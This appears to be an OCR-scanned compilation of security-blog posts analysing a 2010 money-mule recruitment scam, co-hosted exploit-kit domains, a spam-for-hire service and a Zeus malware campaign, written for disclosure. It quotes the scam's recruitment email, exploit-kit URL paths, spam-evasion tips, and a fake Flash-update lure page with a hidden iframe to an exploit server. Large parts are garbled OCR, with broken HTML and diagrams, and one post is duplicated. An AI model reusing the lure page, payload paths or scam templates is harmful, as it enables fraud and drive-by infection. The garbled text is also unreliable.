ttp://ddanchev. blogspot .com/2009/06/iranian-opposition-ddos-es-pro.htm 


. http://ddanchev. blogspot .com/ 
. http://twitter .com/danchodanche 


PH 
ou 
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6.2.12 Dissecting an Ongoing Money Mule Recruitment Campaign (2010-02-12 23:46) 


— 
pow" tntormaionst Security 


1 WHAT 00 we Coren? © Quite sire access 
CEFIN ’ 

Rares Coneting Contre of Caf 
metry & Few a gia 

¢ & FINANCE Oe nt aa OF Rtgs 
peter eee 
sm oe owe < — 

*Necacnice peer 


he . ot of prcgmcte 
for wternatone Darks and rarance Compares © UATesT news 0 events 


© 03.05. 2009 - eftsy Competitars 
Reach Out 
A eth Wher De alhry wove toe Mhen echo 


"AD some 


WEL COme 


4 Semand hoe Maghly prchenncral Coreg Mere Ces 
evchen af 0 contain advanced buaren development 


Money mule recruiters can be sometimes described as mass-marketing zombies, who have 
absolutely no idea who they’re trying to recruit. Cefin Consulting & Finance - cefincf .com - 
195.190.113.106 - Email: flier@infotorrent.ru is the very latest example of such a campaign, 
trying to recruit, well, me. 


The initial recruitment email was spammed from maximumsxz78@roulottesste-anne.com 
with IP 221.154.76.195: 

"Cefin Consulting & Finanace is one of the leading providers of consulting services in the 
world. Our success depends both on high quality of services and on professionally managed 
and reliable business processes. This is the reason why quality is our main concern. However, 
the only way to reach top-notch quality in our business is permanent struggle for quality and 
engineering of stable procedures. It is not possible to reach high quality standards without 
dedicated personnel striving for flawless operation of processes and projects in their daily life. 


Currently we have a Financial Manager opening. No deadlines for applications are set. 
The job of Financial Manager includes processing of money transfers, sent to his personal bank 
accounts by company clients. Upon receiving a transfer the Financial Manager has to redirect 
it to the account specified by our dispatchers. All you need for this job are: 3-4 free hours a 
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day, your wish, ability to work in a team and responsibility. The initial wages will equal 5 % of 
total monthly turnover. 


Requirements to Candidates: 

- 20 years old and more 

- Be able to check your email several times a day 

- Should have personal (or business) bank account 

- Have a skill to communicate and access to the Internet. 

- Foreign language (English is preferable). 

- To have an opportunity in any working hours to go to closest Western Union location and 
make money transfer . 


What we offer: 
- Generous wages - (Your earnings will originally make 5 % from each payment. Your earnings 


will originally make 5 % from each payment. After 5 remittances if you will operatively work 
and correctly, your earnings raises up to 10 %. ) 

- Opportunity of increase in your earnings. 

- Free seminars and training courses (After 6 months of great work). 


2010 © Cefin Consulting & Finanacelf you are interested in this opening, don’t hesitate 
to send your CV at our e-mail: cefincfss@yahoo.com All right reserved." 
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(Mea arcana) Our partners Cama Pace Pay 
came See? | Manning aan tems MOF EAS tadermatinet Security 


) ceFIN 


( & FINANCE 


GO Quite SITE access Repenstitten 


pee ters CW at pepeon Bodied com or 18 out Oe ecw 


Data Hows Anahyst 


Recgnneetelt nes 


Response received from cefincfss@yahoo.com with IP [1]91.207.4.162, asking for the following 
details, althrough the [2]DIY money-mule recruitment management interface automates the 
entire process, thereby allowing it to scale: 

"If you have understood the meaning of work and ready to begin working with us, please send 
us your INFO in the following format: 


1) First name; 2) Last name; 3) Country; 4) City; 5) Zip code; 6) Home Phone number, 
Work Phone number, Mobile Phone number; 7) Bank account info:; a) Bank name; b) Account 
name; c) Account number; d) Sort code; 8) Scan you passport or driver license" 


The CV forwarding email provided is mynesco@yahoo.com, although they'll even recruit 
you without sending them the required CV. 


What’s special about the bogus company, is not the new template layout that they’ve 
purchased from a [3]vendor offering creative for money-mule recruitment campaign, but 
their attempt to establish themselves as a trusted brand by featuring fake certificates issued 
by easily recognizable brands, such as Western Union, Money Gram, Investors in People, the 
World Business Community and even an award from the Chamber Awards for 2004 in the 
category - "Most Promising New Business". 
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05-—-CORP 


Moreover, parked on the very same IP where the money mule recruitment is, are also domains 
currently serving live exploits, as well as a DIY interface for a spamming service known as 


"OS-CORP". 


The certificates in question: 


Sees — at 


THIS CERTIFIES THAT 
CEFIN CONSULTING & FINANCE 


AS AN AUTHORIZED PARTNER 


FROM 14.05.2008 TO 14.05.2010 


Registrar of Western Union shang 
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CEFIN CONSULTING & FINANCE 


has achieved the status of 


MoneyGram. 


eMoney Transfer ; 


Golden Partner 


of West Europe 


No, 3101-46009 


a. 
) 


INVESTORS IN PEOPLE 


This certificate 


records that 


CEFIN CONSULTING & FINANCE | 


Has made a written commitment to 


GREATER MERSEYSIDE ENTERPRISE LTD 


To work towards 
investing effectively 


in all its employees 


Ig- 
\ \9fY cctan 


SIR BRIAN WOLFSON 
CHAIRMAN CHAIRMAN 


CERTIFICATE No, 70820 DATE, 22nd August 2005 
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ORD DUSINESS COMMUN, 


CEFIN CONSULTING & FINANCE 
LIFE CHARTER MEMBER 
E WORLD BUSINESS COMM 


OF TH 
AND PLEDGES TO UPHOLD THE VERY HIGHEST ST. STANDARDS 
OF INTERNATIONAL BUSINESS. 


3102 


THE 
AWARDS 


Most Promising 
New Business 


CEFIN CONSULTING & FINANCE 


Member of the Portsmouth & South East 
Hampshire Chamber of Commerce & Industry 


Highly Commended 


Bile 
ro | BCC 
=f ~ ‘ 
pesscatinas e a rue CayTisn 
Phe Si Carden CHAMBERS OF 
POPERS COMMERCE 


Cefin Consulting & Finance describes itself as: 
"Cefin consulting & Finance was founded at the beginning of 1990. The emerged structure 


united specialists with unique background in management consulting, marketing research, 
business evaluation and stock-exchange operations.The following two companies constitute 


Cefin consulting & Finance: 


- Omega Financial Dept. - the dedicated company in the field of securities operations; 
- Omega Consult - the dedicated consulting company, rendering services in strategic planning 


and corporate management. 


Activity of Cefin consulting & Finance is focused on generation of balanced solutions for active 
development of the company and minimization of business risks. 
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Cate) Time (tT) 2009 © Caf 
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Cefin consulting & Finance offers successful managerial solutions through consulting support 
to projects in various spheres, namely: comprehensive restructuring and organizational devel- 
opment, generation of managing companies, engineering of tailored management systems 
for corporate clients, implementation of project management methods, business development 
financial and economic simulation. 


Top-notch dedicated professionals with key competence in various consulting fields con- 
stitute our rigorous staff. We boast to have management consulting and business strategy 
development experts, certified securities dealers, assessment and registration, marketing 
and financial specialists, corporate law and anti-monopoly legislation gurus. Address: Cefin 
consulting & Finance is located at 510 East 80th Street, New York, New York 10021 , United 
States 786-475-3994; 786-475-3994 (FAX)" 
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The money mule recruitment domain cefincf .com - 195.190.13.106 - Email: 
flier@infotorrent.ru remains active. Parked on the same IP are also the following domains, 
currently hosting live exploit kits: 

384756783900 .cn - Email: abuse@domainsreg.cn 

109438129432 .cn - Email: abuse@domainsreg.cn 

234273849543 .cn - Email: abuse@domainsreg.cn 

783456788839 .cn - Email: abuse@domainsreg.cn 

odnaklasniki .cn - Email: Michell.Gregory2009@yahoo.com - Email profiled in December 
2009's "[4]Celebrity-Themed Scareware Campaign Abusing DocStoc" - money mule 
recruitment connection 

mynes-consultings .cn - Email: grishanizov@gmail.com 

mynes-consult .cn - Email: grishanizov@gmail.com 
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mail.cetinef.com 


ns1.stp0-08.steephostnet 
ns2.stp0-08 steephost net 


S1.109438129432.cn 106,13,190,.195, unknown. steephost net 


enue r 


195.190.13.106 ner 


195.190.13.0(24 —— ge AS47142 


od 


1$2,109438129432.cn ————Ange 195,190.13.107 eas 
————— = 107.153.190.195. unknown steephost net 


Sample live exploit structure, currently active at these domains: 

- mynes-consult .cn -> if exploitation is not possible, the user is redirected to the legitimate 
newegg.com 

- mynes-consult .cn/load.php?spl=mdac 

- mynes-consult .cn/load.php?spl=buddy 

- mynes-consult .cn/load.php?spl=myspace 

- mynes-consult .cn/load.php?spl=vml2 

- mynes-consult .cn/load.php?spl=ymj 

- mynes-consult .cn/load.php?spl=zangol 

- mynes-consult .cn/load.php?spl=zango2 


All of these exploits drop load.exe - [5]TrojanDownloader:Win32/Cutwail.gen!C - Result: 
41/41 (100.00 %), which upon execution phones back to 69.162.86.210. 


With cybercriminals actively multi-tasking these days, this money mule recruitment gang 


doesn’t make an exception. On one of the domains listed above, a low-profile DIY spamming 
service known as OS-CORP is offering its services. 


3106 


The DIY spam service, also has Terms of Service and offers basic spamming recommendations. 
The following is a roughly translated version of them: 

"- No child Porno spamming! 

- Do not offer me affiliate program ( % of sales), | do not care! 

- ICQ almost always online, but this does not mean that | always present! If you have not 
received an answer immediately have patience, | will answer as soon as appearing! 

- Mailing lists on bases of certain subjects are more expensive! 

- | am not responsible for your campaigns and sites sites that are sometimes nailed in the 
process of spam! Use anti-abuse hosting! 

- I’m not offering anti-abuse hosting services! 

- | don’t offer recommendations for such services. | give only the services that spam! 

- Campaign's size should be UP TO 50 kb! 
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Recommendations for the preparation of material for delivery! 

- Do not always send the same text messages, ideally, to change the text after each mailing, 
the effect of there! 

- Do not use themes in writing (headers) words such as EARN, OFFER, do not put a lot of 
exclamation marks and other (better do without them), just one! 

- For a good response from countries whose native language is not English (eg Sweden, 
Spain, Denmark, etc.) is highly desirable to use the native language of the text distributed 
to countries, it gives a wonderful effect, and should not be mistaken, in countries such not 
everyone knows English, verified repeatedly! 

- Do not write too long texts on a number of reasons this does not give a positive effect, but 
not limited to one sentence worth! Ideally, make the text in a few not particularly bulky 
paragraphs!" 


The deeper your analyze, the more malicious, and most importantly, inter-connected it 
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gets. 


Related coverage of money laundering in the context of cybercrime: 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[7]Keeping Reshipping Mule Recruiters on a Short Leash 

[8]Keeping Money Mule Recruiters on a Short Leash 

[9]Standardizing the Money Mule Recruitment Process 

[10]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[11]Money Mules Syndicate Actively Recruiting Since 2002 
[12]Inside a Money Laundering Group’s Spamming Operations 


This post has been reproduced from [13]Dancho Danchev’s blog. Follow him [14]on Twitter. 


ttp://www.projecthoneypot.org/ip_91.207 .4.162?vid=41020a29d1hOpnf8k2kpbinq12 


ttp://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.htm 
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| http://adanchey blogspot. con/2009/11/keeping-noney-mule-recruiters-on-short heal 
10, http: //ddanchev. blogspot .con/2008/07 /noney-mule-recruiters-use-aeproxs-fasthal 
11. http://ddanchev. blogspot . com/2008/10/money-mules-syndicate-actively.html 


ttp://ddanchev. blogspot .com/2009/05/inside-money-1laundering-groups- spamming. html 


13. http://ddanchev. blogspot .com/ 
14. http://twitter .com/danchodanche 


6.2.13 Dissecting an Ongoing Money Mule Recruitment Campaign (2010-02-12 23:46) 
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ADOA Us + Serves + Vacances + Ou Parters + Contacts + Privacy Policy 
Welcome + General Director's Word + Traring + Ask Our Conauitant How + Informatonal Seasity 


Sariesiuey 2008 © Cal 
> 1 ; Al ght reserved. 


Money mule recruiters can be sometimes described as mass-marketing zombies, who have 
absolutely no idea who they’re trying to recruit. Cefin Consulting & Finance - cefincf .com - 
195.190.13.106 - Email: flier@infotorrent.ru is the very latest example of such a campaign, 
trying to recruit, well, me. 


The initial recruitment email was spammed from maximumsxz78@roulottesste-anne.com 
with IP 221.154.76.195: 


"Cefin Consulting & Finanace is one of the leading providers of consulting services in 
the world. Our success depends both on high quality of services and on professionally 
managed and reliable business processes. This is the reason why quality is our main concern. 
However, the only way to reach top-notch quality in our business is permanent struggle for 
quality and engineering of stable procedures. It is not possible to reach high quality standards 
without dedicated personnel striving for flawless operation of processes and projects in their 
daily life. 
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Currently we have a Financial Manager opening. No deadlines for applications are set. 
The job of Financial Manager includes processing of money transfers, sent to his personal bank 
accounts by company clients. Upon receiving a transfer the Financial Manager has to redirect 
it to the account specified by our dispatchers. All you need for this job are: 3-4 free hours a 
day, your wish, ability to work in a team and responsibility. The initial wages will equal 5 % of 
total monthly turnover. 


Requirements to Candidates: 

- 20 years old and more 

- Be able to check your email several times a day 

- Should have personal (or business) bank account 

- Have a skill to communicate and access to the Internet. 
- Foreign language (English is preferable). 


- To have an opportunity in any working hours to go to closest Western Union location 
and make money transfer . 


What we offer: 

- Generous wages - (Your earnings will originally make 5 % from each payment. Your 
earnings will originally make 5 % from each payment. After 5 remittances if you will opera- 
tively work and correctly, your earnings raises up to 10 %. ) 


- Opportunity of increase in your earnings. 


- Free seminars and training courses (After 6 months of great work). 


2010 © Cefin Consulting & Finanacelf you are interested in this opening, don’t hesitate 
to send your CV at our e-mail: cefincfss@yahoo.com All right reserved." 
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© Quite STE ccESsS Respomdiitios: 
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Data Flows Amahyst 


Response received from cefincfss@yahoo.com with IP [1]91.207.4.162, asking for the following 
details, althrough the [2]DIY money-mule recruitment management interface automates the 
entire process, thereby allowing it to scale: 


"If you have understood the meaning of work and ready to begin working with us, please send 
us your INFO in the following format: 


1) First name; 2) Last name; 3) Country; 4) City; 5) Zip code; 6) Home Phone number, 
Work Phone number, Mobile Phone number; 7) Bank account info:; a) Bank name; b) Account 
name; c) Account number; d) Sort code; 8) Scan you passport or driver license" 


The CV forwarding email provided is mynesco@yahoo.com, although they'll even recruit 
you without sending them the required CV. 


What’s special about the bogus company, is not the new template layout that they’ve 
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purchased from a [3]vendor offering creative for money-mule recruitment campaign, but 
their attempt to establish themselves as a trusted brand by featuring fake certificates issued 
by easily recognizable brands, such as Western Union, Money Gram, Investors in People, the 
World Business Community and even an award from the Chamber Awards for 2004 in the 
category - "Most Promising New Business". 


Moreover, parked on the very same IP where the money mule recruitment is, are also 
domains currently serving live exploits, as well as a DIY interface for a spamming service 
known as "OS-CORP". 


The certificates in question: 
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= else a 1 — 0 


Gone lica? 


THIS CERTIFIES THAT 
CEFIN CONSULTING & FINANCE 
AS AN AUTHORIZED PARTNER 


FROM 14.05.2008 TO 14.05.2010 


Registrar of Western Union axle 
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CEFIN CONSULTING & FINANCE 


has achieved the status of 


MoneyGram. 


eMoney Transfer . 


Golden Partner 


of West Europe 


No, 3101-46009 
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an 
) 


INVESTORS IN PEOPLE 


This certificate 


records that 


CEFIN CONSULTING & FINANCE | 


Has made a written commitment to 


GREATER MERSEYSIDE ENTERPRISE LTD 


To work towards 
investing effectively 


in all its employees 


Ig- 
\ cf ect 


SIR BRIAN WOLFSON 
CHAIRMAN CHAIRMAN 


CERTIMICATE No, 70820 DATE, 22nd August 2005 


ORD DUSINESS COMMUNI, 


CEFIN CONSULTING & FINANCE 
LIFE CHARTER MEMBER 
THE WORLD BUSINESS COMM 


OF 
AND PLEDGES TO UPHOLD THE VERY HIGHEST ST. STANDARDS 
OF INTERNATIONAL BUSINESS. 
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THE 
AWARDS 


Most Promising 
New Business 


CEFIN CONSULTING & FINANCE 


Member of the Portsmouth & South East 
Hampshire Chamber of Commerce & Industry 


Highly Commended 


Ea a 
ro . BCC 
T AS 
pesscatsinas Be TUL BRITISH 
Phe OA Carden CHAMBERS OF 
PEPERK COMMERCE 


Cefin Consulting & Finance describes itself as: 
"Cefin consulting & Finance was founded at the beginning of 1990. The emerged struc- 
ture united specialists with unique background in management consulting, marketing 


research, business evaluation and stock-exchange operations.The following two companies 
constitute Cefin consulting & Finance: 


- Omega Financial Dept. - the dedicated company in the field of securities operations; 


- Omega Consult - the dedicated consulting company, rendering services in strategic 
planning and corporate management. 
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Activity of Cefin consulting & Finance is focused on generation of balanced solutions for active 
development of the company and minimization of business risks. 


COSI egovi: CRE acon 


— 


About Us + Services + Vacances « Our Partrers « Contacts « Privacy Policy 
Welcome + General Orecto’s Word + Trang + Act Ou Conavtant How + informetonal Seasity 


Cute Time (eT) 


S September, 2 


2009 © Cafe 


AS right reser 
4s toe 


Cefin consulting & Finance offers successful managerial solutions through consulting support 
to projects in various spheres, namely: comprehensive restructuring and organizational devel- 
opment, generation of managing companies, engineering of tailored management systems 
for corporate clients, implementation of project management methods, business development 
financial and economic simulation. 


Top-notch dedicated professionals with key competence in various consulting fields con- 
stitute our rigorous staff. We boast to have management consulting and business strategy 
development experts, certified securities dealers, assessment and registration, marketing 
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and financial specialists, corporate law and anti-monopoly legislation gurus. Address: Cefin 
consulting & Finance is located at 510 East 80th Street, New York, New York 10021 , United 
States 786-475-3994; 786-475-3994 (FAX)" 
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234971938123 cn 
SE4TS6TESIOO cn 


Pe3sS67 88839 cn 


¢etinet com 


fmt 109498129432 on 


205 1902207 At e4aria? 
fmt 22427 1845542. 00 4 a2 59519022008 ——— im sire 
19S. 1H 13.106 
tid 
mat 384 7S6782900.c0 ? 306.12.290 19S.erknown steeshost net 


mat 787456788999 07 


mad mynes-consuit on 


mas ognaitasnds cn 
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mol 109438129432 on 
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wwe 2he27 384954) cn 
weer 2 24871938223 cn 
wore 224954202524 cn 
wore 384754762900 cn 
wee 783456788839 cn 


wren rymes -tonbeR CN 


The money mule recruitment domain cefincf .com - 195.190.13.106 - Email: 
fller@infotorrent.ru remains active. Parked on the same IP are also the following domains, 
currently hosting live exploit kits: 
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384756783900 .cn - Email: abuse@domainsreg.cn 

109438129432 .cn - Email: abuse@domainsreg.cn 

234273849543 .cn - Email: abuse@domainsreg.cn 

783456788839 .cn - Email: abuse@domainsreg.cn 

odnaklasniki .cn - Email: Michell.Gregory2009@yahoo.com - Email profiled in December 
2009's "[4]Celebrity-Themed Scareware Campaign Abusing DocStoc" - money mule 
recruitment connection 


mynes-consultings .cn - Email: grishanizov@gmail.com 


mynes-consult .cn - Email: grishanizov@gmail.com 


mail.cetine=.com 


ns1.stp0-08.steephost net 
ns2.stp0-08 steephost net 


ns1.109438129432.cn 106.13.190,195, unknown steephost net 
Ap, 2 


195.190.13.106 NET 


195.190.13.0/24  — tinge AS47142 


_ tr 


n$2,109438129432.cn ——-g195.190.13.107 _ 
> = 107.13.190.195.unknown.steaphost net 


Sample live exploit structure, currently active at these domains: 


- mynes-consult .cn -> if exploitation is not possible, the user is redirected to the legiti- 
mate newegg.com 


- mynes-consult .cn/load.php?spl=mdac 
- mynes-consult .cn/load.php?spl=buddy 
- mynes-consult .cn/load.php?spl=myspace 


- mynes-consult .cn/load.php?spl=vml2 
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- mynes-consult .cn/load.php?spl=ymj 
- mynes-consult .cn/load.php?spl=zangol 


- mynes-consult .cn/load.php?spl=zango2 


All of these exploits drop load.exe - [5]TrojanDownloader:Win32/Cutwail.gen!C - Result: 
41/41 (100.00 %), which upon execution phones back to 69.162.86.210. 


With cybercriminals actively multi-tasking these days, this money mule recruitment gang 
doesn’t make an exception. On one of the domains listed above, a low-profile DIY spamming 
service known as OS-CORP is offering its services. 
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The DIY spam service, also has Terms of Service and offers basic spamming recommendations. 
The following is a roughly translated version of them: 


"- No child Porno spamming! 
- Do not offer me affiliate program ( % of sales), | do not care! 


- ICQ almost always online, but this does not mean that | always present! If you have 
not received an answer immediately have patience, | will answer as soon as appearing! 


- Mailing lists on bases of certain subjects are more expensive! 


- | am not responsible for your campaigns and sites sites that are sometimes nailed in 
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the process of spam! Use anti-abuse hosting! 
- I’m not offering anti-abuse hosting services! 


- | don’t offer recommendations for such services. | give only the services that spam! 


- Campaign's size should be UP TO 50 kb! 
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Recommendations for the preparation of material for delivery! 


- Do not always send the same text messages, ideally, to change the text after each 
mailing, the effect of there! 


- Do not use themes in writing (headers) words such as EARN, OFFER, do not put a lot 
of exclamation marks and other (better do without them), just one! 


- For a good response from countries whose native language is not English (eg Sweden, 
Spain, Denmark, etc.) is highly desirable to use the native language of the text distributed 
to countries, it gives a wonderful effect, and should not be mistaken, in countries such not 
everyone knows English, verified repeatedly! 

- Do not write too long texts on a number of reasons this does not give a positive effect, 


but not limited to one sentence worth! Ideally, make the text in a few not particularly bulky 
paragraphs!" 


The deeper your analyze, the more malicious, and most importantly, inter-connected it 
gets. 


Related coverage of money laundering in the context of cybercrime: 
[6]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[7]Keeping Reshipping Mule Recruiters on a Short Leash 

[8]Keeping Money Mule Recruiters on a Short Leash 

[9]Standardizing the Money Mule Recruitment Process 

[10]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[11]Money Mules Syndicate Actively Recruiting Since 2002 


[12]Inside a Money Laundering Group’s Spamming Operations 


This post has been reproduced from [13]Dancho Danchev’s blog. Follow him [14]on Twitter. 


1. http://www.projecthoneypot.org/ip_91.207.4.162?vid=41020a29d1h0pnf8k2kpbinql12 

2, htep:/ /adanchev blogspot. con/2008/10/standardizing-soney-aule-recruitment. ntl 
a fceg//aaneusy Siopepst toa) 2000/10/stemaenciziae crac ae secon nel 
4. : = 
5. 


ttp://ddanchev. blogspot .com/2009/12/celebrity-themed-scareware-campaign_07.htm 


ttp://www.virustotal.com/analisis/1ddfcb68894a31cae13fcb06227901ce87d3449a442c6de83b466e091d1ca5e7- 12660 
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6. http: //ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short.htm 


. http: //ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


. http: //ddanchev. blogspot .com/2009/11/keeping-money-mule-recruiters-on-short.htm 


9. http: //ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment .html 


. http: //ddanchev. blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast .htm 


11. http: //ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.htm 


. http: //ddanchev.blogspot .com/2009/05/inside-money-laundering-groups- spamming. htm 


13. http://ddanchev.blogspot.com/ 
14. http://twitter.com/danchodanche 


6.2.14 IRS/PhotoArchive Themed Zeus/Client-Side Exploits Serving Campaign in the 


Wild (2010-02-15 23:34) 


<html> chead> 
meta Wttp-equiv="Content-Type” content="cext/html; charset=I50-8859-i"> 
<link rel-"stylesheet” type*"text/cas” href<"theme. tet 
stitle>You don't have the lat 
</head><hedy leftmargin="0" t 

tp: 91.201.19 


ia Flash Player</title 
marginheight§"0O" margimridth="0"> 
in.php" widthe"0" height«"O" frameborder*"0"></ iframe 


<br> 

<table bordere"O” widthe"95<"> 

<thody> <tr> 

<t@ width="10"> 

<img arc*"specer.git” bordere"O" height+"25" width*"10"> 
</ta> 

étd valign«"bottee”> 


<fent size**+1" face*"Verdana, Geneva, Arial, Helvetica, sans-serif*>You don't have the latest version of Macromedia Flash Player</fent> 


</ta> 
</te> 

<tr> 

<td> inbap; </td> 

<td class*"bodytext*> 

<p> 

<font face*"irial, Helvetica, sams-serif”">Thia site makes use of Matromedia® Flash(TH) software. You've inatalied an old version of 
</p> 


<p> 


Macromedia Flash 


UPDATED: Monday, February 22, 2010 - Another typosquatted domains portfolio is being 


spamvertised, including two new name servers, parked on the same IP where 
from previous campaigns were hosted. 
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name servers 


NS 


ns2.hourscanine.com 


204.85,72179 ———MEL_g 204.84.0.015 ——“S—p asa 
24.1.214.191 —— Ege 241.0016 ——Ahege 4533491 
64.93.112.254 ———MEL_ 64.93.1120/22 ——“S-m as39939 
67.191.52.17 ———i ge 67.191.0.018 ——Hh-ge as20214 
69.86.206.124 ———_MEL_g® 69.96.192.0719 ——AS-m as12271 
71.204.24.42 ——Mih gs 71.204.0.017 ——Ad-g as7725 
96.33.7483 ——M#EL gy 96 33.64.0119 

AS20115 
66,199,69.144 ———MEL_» 66.198.64,0/20 
71.235.24283 ——MHEege 771.234.0015 ——Ab—g as7015 
64,252.201178 ———MEL_ge 64.252.0.0/16 

nd 
75.42.162.133 Mer 75.32.0.0/12 ——_Sk—ge AS7132 
— 

76.233,74.49 ———NEL_» 76224.0.01 
76.123.45.27 ———“@L—_ge 76.123.0.018 ——i-p as21508 
98.235.5.66 ———MEL_g» 99.235.0.016 ——AS-ge 4533287 
99,194.173.179 ———Mil gs 99.194.160.019 ——AS-p as22561 


ne.kr 


nsl siverbrend.net 


AS? 


ns2.siverbrend.net 


nsl.hourscanine.com 


Typosquatted domains, and name servers of notice are as follows: 
dese.co.kr - Email: asondrapgt@hotmail.com 
dese.kr - Email: asondrapgt@hotmail.com 
dese.ne.kr - Email: asondrapgt@hotmail.com 
dese.or.kr - Email: asondrapgt@hotmail.com 
desr.co.kr - Email: asondrapgt@hotmail.com 
desr.kr - Email: asondrapgt@hotmail.com 
desr.or.kr - Email: asondrapgt@hotmail.com 
desv.co.kr - Email: asondrapgt@hotmail.com 
desv.kr - Email: asondrapgt@hotmail.com 
desv.ne.kr - Email: asondrapgt@hotmail.com 
desv.or.kr - Email: asondrapgt@hotmail.com 
desx.co.kr - Email: asondrapgt@hotmail.com 
desx.kr - Email: asondrapgt@hotmail.com 
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desx.ne.kr - Email: asondrapgt@hotmail.com 
desx.or.kr - Email: asondrapgt@hotmail.com 
edasa.co.kr 

edasa.kr 

edasa.ne.kr 

edasa.orkr 

edase.co.kr 

edase.kr 

edase.ne.kr 

edase.orkr 

edasn.kr 

edasn.ne.kr 

edasn.or.kr 

edasq.co.kr 

edasq.kr 

edasq.ne.kr 

edasq.or.kr 


Name servers of notice: 
ns1,silverbrend.net - 87.117.245.9 - Email: klincz@aol.com 
nsl1.hourscanine.com - 87.117.245.9 - Email: carruawau@gmail.com 


UPDATED: Sunday, February 21, 2010 - The gang is currently spamming a phishing cam- 
paign - no client-side serving iFrames found so far - attempting to steal Google account and 
Blogspot accounting data. Given the fact that the gang is capable of generating hundreds of 
thousands of bogus accounts on their own, as well as buy them in bulk orders from vendors 
that have already built such an inventory across multiple social networking sites, the only 
logical reason for attempting to phish for such data would be to attempt to maliciously 
monetize the traffic of legitimate blogs. 
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6 Blogger 


Sign in te Blogger with your 

© Google Account 

© Blogger username 
Emai/Btogger usemame | 


Password 


The newly spamvertised domains, including a new name server are as follows: 
esub.co.kr - Email: osamplerl61@hotmail.com 

esub.kr - Email: osamplerl61@hotmail.com 

esub.ne.kr - Email: osamplerl61@hotmail.com 

esug.co.kr - Email: osamplerl61@hotmail.com 

esug.kr - Email: osamplerl61@hotmail.com 

esug.ne.kr - Email: osamplerl61@hotmail.com 

esuk.kr - Email: osamplerl61@hotmail.com 

esuk.ne.kr - Email: osamplerl61@hotmail.com 

esuk.or.kr - Email: osamplerl61@hotmail.com 

esus.co.kr - Email: osamplerl61@hotmail.com 

esus.kr - Email: osamplerl61@hotmail.com 

esus.ne.kr - Email: osamplerl61@hotmail.com 

esut.co.kr - Email: osamplerl61@hotmail.com 

esut.kr - Email: osamplerl61@hotmail.com 

esut.ne.kr - Email: osamplerl61@hotmail.com 

ns1.nitroexcel.com - 89.238.165.195 (the same IP was also hosting the name server domains 
from previous Campaigns) - Email: rackmodule@writemail.com 


UPDATED: Saturday, February 20, 2010 - The client-side exploit serving iFrame directory 
has been changed to 91.201.196.101 /usasp11/in.php, with another typosquatted portfolio of 
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domains currently being spamvertised. 


Detection rates: update.exe - [1]Trojan.Zbot - Result: 25/40 (62.5 %) (phones back to 
trollarru /cnf/tri.jpg - 109.95.114.133 - Email: bernardo _pr@inbox.ru); file.exe - [2]Tro- 
jan.Spy.ZBot.12544.1 - Result: 26/41 (63.42 %); ie.js - [3])/S:CVE-2008-0015-G - Result: 14/40 
(35 %); ie2.js - [4]JExploit:JS/CVE-2008-0015 - Result: 17/40 (42.5 %); nowTrue.swf - [5]Tro- 
jan.SWF.Dropper.E - Result: 24/41 (58.54 %); pdf.pdf - [6]JExploit.JS.Pdfka.bIn - Result: 11/41 
(26.83 %); swf.swf - [7]SWF/Exploit.Agent.BS - Result: 8/40 (20 %). 


oe 14.27.0026 ———___“2_—___» 453462 


114.27.36.147 
116.800.0114 ————__—___“_____y» s2510 


gp 


116.80.31.193 = 
A BP  nithyo717193.thyo.ntith. ppp infoweb ne jp 


174.98.48.10 ner 
A i 174.96.0.014 ————______48._—__® si1426 


174,98.80.202 aS , 
201.13.0.016 —————_+—____» 4527699 


a 


4 201.13.206.139 ne 
= 24.10.0.017 — AS ge AS33651 


24.10.6.145 
24.12.0.014 


aid AS33491 
24,12.117.89 ee —— - 


| ad sini 
y, 67.167.93.150 , 
66.253.176.0723 ——______48-__® as7ois 


ed 


66.253.177.44 


, ieee 68,204.0.015 ————4_y 4513343 
<> A 68,204.174.101 : 
a akan 75.160.0.012 —— Ege AS 209 
A 75.17259.17 = 
\ Te 75-172-59-17 tukwqwestnet 
= 
\ 75.210.90.138 wer ; 
M 75,210,006 Ege 522394 
A 
75.26.198.55 NET 


a  75.0.0.011 


P F AS7132 
76,211.118.33 Net 
a 76,208.0.0113 


ne 84.229.37.196 wet a ASOLLG 
i $4.229,32.0120 
ns nsl_skcservices.net A a 74.117.56.021 ———AS-ge AS40676 
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orkr 


Domain portfolio, name server of notice - nsl.vektoroils.net - 74.117.63.218 - Email: ad- 
min@forsyte.info : 

desa.co.kr - Email: hjfeasey@yahoo.co.uk 

desa.kr - Email: hjfeasey@yahoo.co.uk 

desa.ne.kr - Email: hjfeasey@yahoo.co.uk 

desa.or.kr - Email: hjfeasey@yahoo.co.uk 
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desb.co.kr - Email: hjfeasey@yahoo.co.uk 
desb.kr - Email: hjfeasey@yahoo.co.uk 
desb.ne.kr - Email: hjfeasey@yahoo.co.uk 
desb.or.kr - Email: hjfeasey@yahoo.co.uk 
deso.kr - Email: hjfeasey@yahoo.co.uk 
deso.or.kr - Email: hjfeasey@yahoo.co.uk 
desv.kr - Email: hjfeasey@yahoo.co.uk 
desz.co.kr - Email: hjfeasey@yahoo.co.uk 
desz.kr - Email: hjfeasey@yahoo.co.uk 
desz.ne.kr - Email: hjfeasey@yahoo.co.uk 
desz.or.kr - Email: hjfeasey@yahoo.co.uk 


UPDATED: Wednesday, February 17, 2010 - The iFrame directory has been changed to 


91.201.196.101 /usasp/in.php, detection rate for update.exe - [8]Trojan-Spy.Win32.Zbot.gen - 
Result: 17/40 (42.5 %). 
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Currently active and spamvertised domains include: 
saqwk.co.kr - Email: CamercO5@yahoo.com 
saqwk.kr - Email: CamercO5@yahoo.com 
saqwk.ne.kr - Email: CamercO5@yahoo.com 
saqwk.or.kr - Email: CamercO5@yahoo.com 
saqwm.co.kr - Email: CamercO5@yahoo.com 
saqwm.kr - Email: CamercO5@yahoo.com 
saqwm.ne.kr - Email: CamercO5@yahoo.com 
saqwq.co.kr - Email: CamercO5@yahoo.com 
saqwq.kr - Email: CamercO5@yahoo.com 
saqwq.ne.kr - Email: CamercO5@yahoo.com 
saqwq.or.kr - Email: CamercO5@yahoo.com 
